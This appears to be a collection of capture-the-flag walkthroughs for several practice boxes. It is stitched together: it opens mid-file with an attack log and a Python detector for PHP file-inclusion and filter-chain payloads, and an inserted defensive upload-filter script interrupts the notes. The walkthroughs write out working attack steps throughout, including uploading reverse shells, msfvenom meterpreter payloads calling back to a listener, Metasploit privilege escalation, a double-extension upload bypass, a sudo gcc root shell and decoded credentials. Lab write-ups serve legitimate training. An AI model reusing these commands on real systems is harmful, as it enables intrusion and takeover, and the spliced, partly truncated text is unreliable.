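192.168.56.101 - - [04/Mar/2025:19:10:01 +0800] "GET /n3gr4/m414nj3.php?file=/etc/passwd HTTP/1.1" 200 0 "-" "Wfuzz/3.1.0"
192.168.56.101 - - [04/Mar/2025:19:10:01 +0800] "GET /n3gr4/m414nj3.php?id=/etc/passwd HTTP/1.1" 200 0 "-" "Wfuzz/3.1.0"
192.168.56.101 - - [04/Mar/2025:19:10:02 +0800] "GET /n3gr4/m414nj3.php?page=/etc/passwd HTTP/1.1" 200 1066 "-" "curl/8.5.0"
192.168.56.101 - - [04/Mar/2025:19:10:05 +0800] "GET /n3gr4/m414nj3.php?page=php://filter/read=convert.base64-encode/resource=m414nj3.php HTTP/1.1" 200 80 "-" "curl/8.5.0"
192.168.56.101 - - [04/Mar/2025:19:10:09 +0800] "GET /n3gr4/m414nj3.php?page=php://filter/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.base64-decode/resource=php://temp&a=id HTTP/1.1" 200 120 "-" "curl/8.5.0"
192.168.56.101 - - [04/Mar/2025:19:10:12 +0800] "GET /n3gr4/m414nj3.php?page=about HTTP/1.1" 200 512 "-" "Mozilla/5.0"
192.168.1.50 - - [04/Mar/2025:19:11:40 +0800] "GET /n3gr4/m414nj3.php?page=..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 1066 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3}) '
)

# Ordered list of (label, pattern) applied to every decoded query value.
INCLUSION_PATTERNS = [
    ("filter-chain", re.compile(r"php://filter/.*convert\.iconv\.", re.I)),
    ("php-wrapper", re.compile(r"^(php|data|expect|phar|zip)://", re.I)),
    ("sensitive-file", re.compile(r"(^|/)(etc/(passwd|shadow)|proc/self|\.ssh/id_rsa|\.bash_history)", re.I)),
    ("traversal", re.compile(r"\.\.[/\\]")),
]


def parse_line(line):
    """Split one combined-log line into ip, path, decoded query params, status."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlsplit(m.group("target"))
    # parse_qs percent-decodes once; unquote again so a double-encoded payload
    # such as %252e%252e%252f is also seen in clear.
    params = {k: [unquote(v) for v in vals]
              for k, vals in parse_qs(url.query, keep_blank_values=True).items()}
    return {"ip": m.group("ip"), "path": url.path,
            "params": params, "status": int(m.group("status"))}


def classify(entry):
    """Return [(param, [labels])] for every query value matching a pattern."""
    findings = []
    for name, values in entry["params"].items():
        for value in values:
            labels = [label for label, pat in INCLUSION_PATTERNS if pat.search(value)]
            if labels:
                findings.append((name, labels))
    return findings


def scan_log(text):
    """One alert per suspicious query value across the whole log."""
    alerts = []
    for line in text.splitlines():
        entry = parse_line(line)
        if entry is None:
            continue
        for param, labels in classify(entry):
            alerts.append({"ip": entry["ip"], "path": entry["path"], "param": param,
                           "labels": labels, "status": entry["status"]})
    return alerts


def fuzzed_parameters(text, threshold=4):
    """(ip, path) pairs hit with at least `threshold` distinct parameter names:
    the footprint of parameter-name fuzzing like the wfuzz run above."""
    seen = {}
    for line in text.splitlines():
        entry = parse_line(line)
        if entry is None:
            continue
        seen.setdefault((entry["ip"], entry["path"]), set()).update(entry["params"])
    return {key: len(names) for key, names in seen.items() if len(names) >= threshold}


if __name__ == "__main__":
    for alert in scan_log(SAMPLE_LOG):
        print(alert)
    print(fuzzed_parameters(SAMPLE_LOG))
```

The threshold of 4 is tuned to the tiny sample; on a real server the wfuzz run above would produce thousands of distinct names against one path in seconds, so a much higher threshold over a time window is appropriate. The labels are coarse on purpose: the point of the filter-chain label is that a legitimate include value never contains convert.iconv, so even one hit is worth an alert.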
Quoted
Information gathering
The MAC address is 00:0C:29:26:7C:E2, giving the IP address 192.168.136.137; scan the ports
┌──(root㉿zss)-[/home/zss]
└─# nmap -p- 192.168.136.137
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-06 19:49 CST
Nmap scan report for bogon (192.168.136.137)
Host is up (0.00077s latency).
Not shown: 65523 closed tcp ports (reset)
PORT STATE SERVICE
21/tcp open ftp
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
5357/tcp open wsdapi
49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
49155/tcp open unknown
49156/tcp open unknown
49157/tcp open unknown
MAC Address: 00:0C:29:26:7C:E2 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 18.04 seconds
So many ports; scan the specific ones with nmap -sV -sT -p 21,80,135,139,445,5357 192.168.136.137. First see what is on FTP; anonymous login works
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>IIS7</title>
<style type="text/css">
<!--
body {
color:#000000;
background-color:#B3B3B3;
margin:0;
}
#container {
margin-left:auto;
margin-right:auto;
text-align:center;
}
a img {
border:none;
}
-->
</style>
</head>
<body>
<div id="container">
<a href="http://go.microsoft.com/fwlink/?linkid=66138&clcid=0x409"><img src="welcome.png" alt="IIS7" width="571" height="411" /></a>
</div>
</body>
</html>
This should be the source of the page on port 80. I found that a webshell can be uploaded, and the directory FTP lands in should be the web root, so upload a webshell and see whether it connects. Wappalyzer said the site uses PHP, but I didn't notice that it is an ASP framework, so the PHP webshell couldn't connect; find an ASP one and upload it instead
User flag
ASP webshell:
https://github.com/borjmz/aspx-reverse-shell/blob/master/shell.aspx
The script contents need editing. Start a listener on kali, then curl the uploaded aspx file; after a moment the listener gets the shell, and from there it's a matter of reading the user flag
Root flag
Here use msfvenom -p windows/meterpreter/reverse_tcp lport=4444 lhost=192.168.136.161 -f exe > shell.exe to generate a reverse-shell exe, upload shell.exe to the target and run it there while kali listens. The session obtained is not admin yet and needs privilege escalation: background it first, then use the multi/recon/local_exploit_suggester module; after run it lists the exploitable modules, then use one to escalate
use exploit/multi/handler
show options
set payload windows/meterpreter/reverse_tcp
show options
set lhost 192.168.136.161
run
bg
sessions
use multi/recon/local_exploit_suggester
show options
set session 1
run
use exploit/windows/local/ms16_075_reflection_juicy
set session 1
set lhost 192.168.136.161
run
Nessus
Information gathering
┌──(root㉿kali-plus)-[~]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:1d:89:b5, IPv4: 192.168.56.101
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.56.1 0a:00:27:00:00:17 (Unknown: locally administered)
192.168.56.100 08:00:27:d2:fb:04 PCS Systemtechnik GmbH
192.168.56.156 08:00:27:4f:9a:15 PCS Systemtechnik GmbH
The IP address is 192.168.56.156; scan the ports
┌──(root㉿kali-plus)-[~]
└─# nmap 192.168.56.156 -sV -sT -p 135,139,445,5985,8834,47001,49664
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-10 20:56 CST
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
Nmap scan report for 192.168.56.156
Host is up (0.0025s latency).
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
8834/tcp open ssl/nessus-xmlrpc?
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
49664/tcp open msrpc Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port8834-TCP:V=7.94SVN%T=SSL%I=7%D=3/10%Time=67CEE183%P=x86_64-pc-linux
SF:-gnu%r(GetRequest,788,"HTTP/1\.1\x20200\x20OK\r\nCache-Control:\x20must
SF:-revalidate\r\nX-Frame-Options:\x20DENY\r\nContent-Type:\x20text/html\r
SF:\nETag:\x20fc785d9fb222132265fb83f9adb1608e\r\nConnection:\x20close\r\n
SF:X-XSS-Protection:\x201;\x20mode=block\r\nServer:\x20NessusWWW\r\nDate:\
SF:x20Tue,\x2011\x20Mar\x202025\x2003:56:40\x20GMT\r\nX-Content-Type-Optio
SF:ns:\x20nosniff\r\nContent-Length:\x201217\r\nContent-Security-Policy:\x
SF:20upgrade-insecure-requests;\x20block-all-mixed-content;\x20form-action
SF:\x20'self';\x20frame-ancestors\x20'none';\x20frame-src\x20https://store
SF:\.tenable\.com;\x20default-src\x20'self';\x20connect-src\x20'self'\x20w
SF:ww\.tenable\.com;\x20script-src\x20'self'\x20www\.tenable\.com;\x20img-
SF:src\x20'self'\x20data:;\x20style-src\x20'self'\x20www\.tenable\.com;\x2
SF:0object-src\x20'none';\x20base-uri\x20'self';\r\nStrict-Transport-Secur
SF:ity:\x20max-age=31536000\r\nExpect-CT:\x20max-age=0\r\n\r\n<!doctype\x2
SF:0html>\n<html\x20lang=\"en\">\n\x20\x20\x20\x20<head>\n\x20\x20\x20\x20
SF:\x20\x20\x20\x20<meta\x20http-equiv=\"X-UA-Compatible\"\x20content=\"IE
SF:=edge,chrome=1\"\x20/>\n\x20\x20\x20\x20\x20\x20\x20\x20<meta\x20http-e
SF:quiv=\"Content-Security-Policy\"\x20content=\"upgrade-inse");
MAC Address: 08:00:27:4F:9A:15 (Oracle VirtualBox virtual NIC)
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 138.95 seconds
I looked up the service on port 445, https://www.cnblogs.com/oksir/p/14735966.html; roughly, it is the SMB service, which on Linux can be inspected with smbclient
┌──(root㉿kali-plus)-[~]
└─# smbclient -L 192.168.56.156
Password for [WORKGROUP\root]:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
Documents Disk
IPC$ IPC Remote IPC
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 192.168.56.156 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
┌──(root㉿kali-plus)-[~]
└─# smbclient //192.168.56.156/Documents
Password for [WORKGROUP\root]:
Try "help" to get a list of possible commands.
smb: \> ls
. DR 0 Sat Oct 19 08:42:53 2024
.. D 0 Sat Oct 19 13:08:23 2024
desktop.ini AHS 402 Sun Jun 16 01:54:33 2024
My Basic Network Scan_hwhm7q.pdf A 122006 Sat Oct 19 06:19:59 2024
My Music DHSrn 0 Sun Jun 16 01:54:27 2024
My Pictures DHSrn 0 Sun Jun 16 01:54:27 2024
My Videos DHSrn 0 Sun Jun 16 01:54:27 2024
Web Application Tests_f6jg9t.pdf A 136025 Sat Oct 19 06:20:14 2024
12942591 blocks of size 4096. 10997216 blocks available
There are the files My Basic Network Scan_hwhm7q.pdf and Web Application Tests_f6jg9t.pdf
You can get them, but they are of no use. The username and password need brute-forcing. The username is a trap: look at the author, josemlwdf; from the writeup the username turns out to be jose. The password depends on luck or on finding a matching wordlist; it is tequiero. After logging in there is nothing, but under My Account there is a proxy server: the account is visible, the password is not, and changing the field type from password to text in the front end doesn't reveal it either. The server address can be changed, though, so set it to my kali's IP address
There are several modes; trying them one by one, Basic mode returned something suspicious, so base64-decode it
┌──(root㉿kali-plus)-[~]
└─# nc -lvvp 4444
nc: getnameinfo: Temporary failure in name resolution
nc: getnameinfo: Temporary failure in name resolution
CONNECT plugins.nessus.org:443 HTTP/1.1
Proxy-Authorization: Basic bmVzdXM6WiNKdVhIJHBoLTt2QCxYJm1WKQ==
Host: plugins.nessus.org
Connection: keep-Alive
User-Agent: Nessus/10.7.3
Content-Length: 0
Proxy-Connection: Keep-Alive
bmVzdXM6WiNKdVhIJHBoLTt2QCxYJm1WKQ==
nesus:Z#JuXH$ph-;v@,X&mV)
Z#JuXH$ph-;v@,X&mV) looks like a password. I had no idea what to do next; watching the video, I saw a tool called evil-winrm was used. Tool introduction: https://www.cnblogs.com/backlion/p/17202253.html
Evil-winrm is an open-source tool written in Ruby. It has many cool features, including remote login with a plaintext password, SSL-encrypted login, NTLM hash login, key login, file transfer and log storage. The author keeps the tool updated and maintains it long term. With evil-winrm we get a PowerShell command session on the remote host. The tool is integrated into Kali Linux, but if you want to download it separately you can get it from its official git repository.
There was a hint earlier: in the initial port scan, port 5985 was open. When the remote host runs the WinRM service, its default ports are 5985 and 5986, so scan 5985 again
┌──(root㉿kali-plus)-[~]
└─# nmap -p 5985 192.168.56.156
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-13 19:30 CST
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
Nmap scan report for 192.168.56.156
Host is up (0.00100s latency).
PORT STATE SERVICE
5985/tcp open wsman
MAC Address: 08:00:27:4F:9A:15 (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 0.22 seconds
Seeing wsman means the winrm service is enabled, which gives a lead: log in with evil-winrm
evil-winrm -i 192.168.56.156 -u nesus -p 'Z#JuXH$ph-;v@,X&mV)'
But I could not get this tool to work
┌──(root㉿kali-plus)-[~/evil-winrm/evil-winrm-master]
└─# ruby evil-winrm.rb -i 192.168.56.156 -u nesus -p 'Z#JuXH$ph-;v@,X&mV)'
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
Error: An error of type WinRM::WinRMAuthorizationError happened, message is WinRM::WinRMAuthorizationError
Error: Exiting with code 1
User flag
72113f41d43e88eb5d67f732668bc3d1
Root flag
DLL hijacking is needed here
DLL hijacking tutorial: something to study when I have time
https://www.cnblogs.com/Xy--1/p/14487495.html
b5fc5a4ebfc20cc18220a814e1aee0aa
up
Information gathering
The MAC address is 00:50:56:2D:04:07 and the IP address 192.168.1.103; gather the port information
┌──(root㉿kali-plus)-[~]
└─# nmap -sC 192.168.1.103 -p 80
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-16 23:35 CST
Nmap scan report for bogon (192.168.1.103)
Host is up (0.00038s latency).
PORT STATE SERVICE
80/tcp open http
|_http-title: RodGar - Subir Imagen
MAC Address: 00:50:56:2D:04:07 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 0.48 seconds
Port 80 is open; the page is a file upload feature, but only jpg and gif are allowed. Scan the directories
┌──(root㉿kali-plus)-[~]
└─# dirsearch -u http://192.168.1.103/
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
from pkg_resources import DistributionNotFound, VersionConflict
_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460
Output File: /root/reports/http_192.168.1.103/__25-03-16_23-42-34.txt
Target: http://192.168.1.103/
[23:42:34] Starting:
[23:42:35] 403 - 278B - /.ht_wsr.txt
[23:42:35] 403 - 278B - /.htaccess.bak1
[23:42:35] 403 - 278B - /.htaccess.orig
[23:42:35] 403 - 278B - /.htaccess.sample
[23:42:35] 403 - 278B - /.htaccess.save
[23:42:35] 403 - 278B - /.htaccess_extra
[23:42:35] 403 - 278B - /.htaccess_orig
[23:42:35] 403 - 278B - /.htaccessBAK
[23:42:35] 403 - 278B - /.htaccessOLD
[23:42:35] 403 - 278B - /.htaccessOLD2
[23:42:35] 403 - 278B - /.htaccess_sc
[23:42:35] 403 - 278B - /.html
[23:42:35] 403 - 278B - /.htm
[23:42:35] 403 - 278B - /.httr-oauth
[23:42:35] 403 - 278B - /.htpasswds
[23:42:35] 403 - 278B - /.htpasswd_test
[23:42:36] 403 - 278B - /.php
[23:42:56] 301 - 319B - /javascript -> http://192.168.1.103/javascript/
[23:43:07] 403 - 278B - /server-status
[23:43:07] 403 - 278B - /server-status/
[23:43:11] 301 - 316B - /uploads -> http://192.168.1.103/uploads/
[23:43:11] 403 - 964B - /uploads/
Task Completed
There is a /javascript and an /uploads; scanning again with uploads appended turns up a robots.txt, and visiting it gives:
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
Decoding it gives the source
<?php
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    $targetDir = "uploads/";
    $fileName = basename($_FILES["image"]["name"]);
    // Only the text after the LAST dot is checked; everything before it,
    // including any earlier extension, stays in the basename.
    $fileType = pathinfo($fileName, PATHINFO_EXTENSION);
    $fileBaseName = pathinfo($fileName, PATHINFO_FILENAME);
    $allowedTypes = ['jpg', 'jpeg', 'gif'];
    if (in_array(strtolower($fileType), $allowedTypes)) {
        // ROT13 on ASCII letters of the basename: this is why shell.jpg became furyy.jpg.
        $encryptedFileName = strtr($fileBaseName,
            'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz',
            'NOPQRSTUVWXYZABCDEFGHIJKLMnopqrstuvwxyzabcdefghijklm');
        $newFileName = $encryptedFileName . "." . $fileType;
        $targetFilePath = $targetDir . $newFileName;
        if (move_uploaded_file($_FILES["image"]["tmp_name"], $targetFilePath)) {
            $message = "El archivo se ha subido correctamente.";
        } else {
            $message = "Hubo un error al subir el archivo.";
        }
    } else {
        $message = "Solo se permiten archivos JPG y GIF.";
    }
}
?>
User flag
There is a substitution, rot13: the shell.jpg uploaded earlier was renamed furyy.jpg. Upload a shell.php.gif and connect with AntSword
Get a reverse shell from AntSword; the user flag is in /home/rodgar
b45cffe084dd3d20d928bee
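The upload handler above fails in two independent ways: pathinfo() validates only the final extension, and the stored name is a deterministic transform of user input. As an added example (not code from the box), original_filter reproduces the PHP's decision and stored name in Python so the behaviour can be checked directly, and hardened_check is an assumed defensive rewrite: a single extension, a strict basename charset, magic bytes that must agree with the extension, and a random stored name. The MAGIC table is a constructed lookup of JPEG and GIF headers.

```python
import os
import re
import secrets

ALLOWED = {"jpg", "jpeg", "gif"}
# Leading bytes of the formats the site accepts (JPEG SOI marker, GIF header).
MAGIC = {"jpg": b"\xff\xd8\xff", "jpeg": b"\xff\xd8\xff", "gif": b"GIF8"}

# Same letter mapping as the strtr() call in the PHP: ROT13 on ASCII letters.
ROT13 = str.maketrans(
    "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz",
    "NOPQRSTUVWXYZABCDEFGHIJKLMnopqrstuvwxyzabcdefghijklm",
)


def original_filter(filename):
    """Same decision as the page's PHP: pathinfo() looks at the text after the
    LAST dot only, so every earlier '.xxx' survives inside the basename and is
    carried, ROT13-ed, into the stored name. Returns the stored name, or None."""
    name = os.path.basename(filename)
    base, dot, ext = name.rpartition(".")
    if not dot:  # no extension: PHP's $fileType is empty and fails in_array()
        return None
    if ext.lower() not in ALLOWED:
        return None
    return base.translate(ROT13) + "." + ext


def hardened_check(filename, head):
    """Defensive variant: one extension only, a conservative basename charset,
    magic bytes that agree with the extension, and a stored name that is
    random rather than derived from user input. Returns (ok, name_or_reason)."""
    name = os.path.basename(filename)
    parts = name.split(".")
    if len(parts) != 2 or not re.fullmatch(r"[A-Za-z0-9_-]{1,64}", parts[0]):
        return False, "bad-name"
    ext = parts[1].lower()
    if ext not in ALLOWED:
        return False, "bad-extension"
    if not head.startswith(MAGIC[ext]):
        return False, "content-mismatch"
    return True, secrets.token_hex(16) + "." + ext


if __name__ == "__main__":
    for candidate in ("shell.jpg", "shell.php.gif", "shell.php"):
        print(candidate, "->", original_filter(candidate))
    print(hardened_check("shell.php.gif", b"GIF89a"))
    print(hardened_check("photo.gif", b"GIF89a\x01\x00"))
```

The magic-byte check is deliberately applied after the name checks so that a rejected name never reaches the content stage; in a real handler the same ordering avoids reading the upload body for names that should never have been accepted. Serving the uploads directory with script execution disabled is the remaining server-side control this code cannot provide.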
Privilege escalation - root flag
There is a clue.txt that tells us the location of a wordlist, but it is under /root/rodgarpass and cannot be read directly. Start an HTTP server on kali and run gobuster against kali with that wordlist; the requested paths reveal the wordlist's contents
sudo gobuster dir -u http://192.168.1.104:9999 -w /root/rodgarpass
┌──(root㉿kali-plus)-[~]
└─# python3 -m http.server 9999
Serving HTTP on 0.0.0.0 port 9999 (http://0.0.0.0:9999/) ...
192.168.1.103 - - [17/Mar/2025 00:21:55] "GET / HTTP/1.1" 200 -
192.168.1.103 - - [17/Mar/2025 00:21:55] code 404, message File not found
192.168.1.103 - - [17/Mar/2025 00:21:55] "GET /d7401714-8883-4fdc-a1d9-cc1fccab40ce HTTP/1.1" 404 -
192.168.1.103 - - [17/Mar/2025 00:21:55] code 404, message File not found
192.168.1.103 - - [17/Mar/2025 00:21:55] "GET /b45cffe084dd3d20d928bee85e7b0f2 HTTP/1.1" 404 -
There is b45cffe084dd3d20d928bee85e7b0f2; although this md5 is only 31 characters, cmd5 can crack it to string
That should be rodgar's password, but after a long time trying (no interactive shell, and for some reason commands stopped working) I found string is not the password; b45cffe084dd3d20d928bee85e7b0f21 is. Once in, still not root; need to escalate further
sudo -l
Matching Defaults entries for rodgar on debian:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin,
use_pty
User rodgar may run the following commands on debian:
(ALL : ALL) NOPASSWD: /usr/bin/gcc, /usr/bin/make
Go straight to GTFOBins and search for gcc or make
sudo gcc -wrapper /bin/sh,-s .
id
uid=0(root) gid=0(root) grupos=0(root)
cd root
ls
rodgarpass
rooo_-tt.txt
cat rooo_-tt.txt
44b3f261e197124e60217d6ffe7e71a8e0175ae0
Always
Information gathering
The MAC address is 00:0C:29:87:10:2E, giving the IP address 192.168.136.138
┌──(root㉿kali-plus)-[~]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:1d:89:b5, IPv4: 192.168.136.161
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.136.1 00:50:56:c0:00:08 VMware, Inc.
192.168.136.2 00:50:56:e2:99:32 VMware, Inc.
192.168.136.138 00:0c:29:87:10:2e VMware, Inc.
192.168.136.254 00:50:56:e3:e2:84 VMware, Inc.
4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.074 seconds (123.43 hosts/sec). 4 responded
Port scanning
┌──(root㉿kali-plus)-[~]
└─# nmap 192.168.136.138 -p-
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-18 17:14 CST
Nmap scan report for 192.168.136.138
Host is up (0.00082s latency).
Not shown: 65522 closed tcp ports (reset)
PORT STATE SERVICE
21/tcp open ftp
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3389/tcp open ms-wbt-server
5357/tcp open wsdapi
8080/tcp open http-proxy
49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
49155/tcp open unknown
49156/tcp open unknown
49157/tcp open unknown
MAC Address: 00:0C:29:87:10:2E (VMware)
Nmap done: 1 IP address (1 host up) scanned in 35.25 seconds
┌──(root㉿kali-plus)-[~]
└─# nmap -sT -sV 192.168.136.138 -p 135,139,445,49152
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-18 17:17 CST
Nmap scan report for 192.168.136.138
Host is up (0.00055s latency).
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
49152/tcp open msrpc Microsoft Windows RPC
MAC Address: 00:0C:29:87:10:2E (VMware)
Service Info: Host: ALWAYS-PC; OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 73.31 seconds
Scan port 8080 for directories with dirsearch
┌──(root㉿kali-plus)-[~]
└─# dirsearch -u http://192.168.136.138:8080
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
from pkg_resources import DistributionNotFound, VersionConflict
_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460
Output File: /root/reports/http_192.168.136.138_8080/_25-03-18_17-21-34.txt
Target: http://192.168.136.138:8080/
[17:21:34] Starting:
[17:21:34] 403 - 199B - /%3f/
[17:21:34] 403 - 199B - /%C0%AE%C0%AE%C0%AF
[17:21:35] 403 - 199B - /%ff
[17:21:38] 403 - 199B - /.ht_wsr.txt
[17:21:38] 403 - 199B - /.htaccess.bak1
[17:21:38] 403 - 199B - /.htaccess.orig
[17:21:38] 403 - 199B - /.htaccess.sample
[17:21:38] 403 - 199B - /.htaccess.save
[17:21:38] 403 - 199B - /.htaccess_extra
[17:21:38] 403 - 199B - /.htaccess_sc
[17:21:38] 403 - 199B - /.htaccessBAK
[17:21:38] 403 - 199B - /.htaccessOLD
[17:21:38] 403 - 199B - /.htaccessOLD2
[17:21:38] 403 - 199B - /.html
[17:21:38] 403 - 199B - /.htaccess_orig
[17:21:38] 403 - 199B - /.htpasswd_test
[17:21:38] 403 - 199B - /.htm
[17:21:38] 403 - 199B - /.httr-oauth
[17:21:38] 403 - 199B - /.htpasswds
[17:21:49] 301 - 242B - /Admin -> http://192.168.136.138:8080/Admin/
[17:21:49] 301 - 242B - /admin -> http://192.168.136.138:8080/admin/
[17:21:49] 200 - 3KB - /admin%20/
[17:21:49] 301 - 242B - /ADMIN -> http://192.168.136.138:8080/ADMIN/
[17:21:49] 301 - 243B - /admin. -> http://192.168.136.138:8080/admin./
[17:21:50] 200 - 3KB - /Admin/
[17:21:50] 200 - 3KB - /admin/
[17:21:51] 200 - 3KB - /admin/index.html
[17:22:07] 403 - 199B - /cgi-bin/
[17:22:07] 500 - 530B - /cgi-bin/printenv.pl
[17:22:25] 403 - 199B - /index.php::$DATA
[17:23:01] 403 - 199B - /Trace.axd::$DATA
[17:23:08] 403 - 199B - /web.config::$DATA
Task Completed
The /admin directory has a login page. Capturing the request and testing it shows that many username/password combinations log in successfully, and we get an admin's note: ZnRwdXNlcjpLZWVwR29pbmdCcm8hISE=
ZnRwdXNlcjpLZWVwR29pbmdCcm8hISE=
ftpuser:KeepGoingBro!!!
Decoding it gives the FTP username and password. Logging in over FTP to see what is there, we find a robots.txt
User-agent: *
Disallow: /admins-secret-pagexxx.html
Visiting that path reveals the following
Admin's Secret Notes
1) Disable the firewall and Windows Defender.
2) Enable FTP and SSH.
3) Start the Apache server.
4) Don't forget to change the password for user 'always'. Current password is "WW91Q2FudEZpbmRNZS4hLiE=".
It contains another username and password
always/YouCantFindMe.!.!
But it is not clear where this account is used, so let's just log in with the ftpuser account and get a reverse shell
user flag
Generate a shell .exe with msfvenom
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.136.140 lport=4444 -f exe -o always.exe
Then start a server on Kali and download the file onto the target
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
show options
set lhost 192.168.136.161
run
bg
use multi/recon/local_exploit_suggester
set session 1
run
HMV{You_Found_Me!}
Privilege escalation: root flag
Next is finding the matching exploit module and escalating privileges
HMV{White_Flag_Raised}
Matrioshka
Information gathering
The IP address is 192.168.1.105; the hosts file needs an entry: 192.168.1.105 mamushka
┌──(root㉿kali-plus)-[~]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:1d:89:b5, IPv4: 192.168.1.104
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.1.1 3c:06:a7:fa:49:88 TP-LINK TECHNOLOGIES CO.,LTD.
192.168.1.101 e0:2e:0b:94:50:57 Intel Corporate
192.168.1.100 12:d6:07:52:ab:25 (Unknown: locally administered)
192.168.1.102 60:e3:2b:ab:61:39 Intel Corporate
192.168.1.105 08:00:27:0e:de:b4 PCS Systemtechnik GmbH
5 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.103 seconds (121.73 hosts/sec). 5 responded
Port enumeration
┌──(root㉿kali-plus)-[~]
└─# nmap -p- 192.168.1.105
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-18 20:43 CST
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
Nmap scan report for 192.168.1.105
Host is up (0.0015s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 08:00:27:0E:DE:B4 (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 14.76 seconds
user flag
Port 80 runs a WordPress blog, so there must be an admin backend, but the username and password are unknown. The plan is to scan the site with wpscan, but wpscan needs an API token, so I chose nuclei instead
┌──(root㉿kali-plus)-[~/Desktop/nuclei_3.3.9_linux_amd64]
└─# ./nuclei -u http://mamushka.hmv
__ _
____ __ _______/ /__ (_)
/ __ \/ / / / ___/ / _ \/ /
/ / / / /_/ / /__/ / __/ /
/_/ /_/\__,_/\___/_/\___/_/ v3.3.9
projectdiscovery.io
[INF] Current nuclei version: v3.3.9 (outdated)
[INF] Current nuclei-templates version: v10.1.5 (latest)
[WRN] Scan results upload to cloud is disabled.
[INF] New templates added in latest release: 281
[INF] Templates loaded for current scan: 7754
[INF] Executing 7565 signed templates from projectdiscovery/nuclei-templates
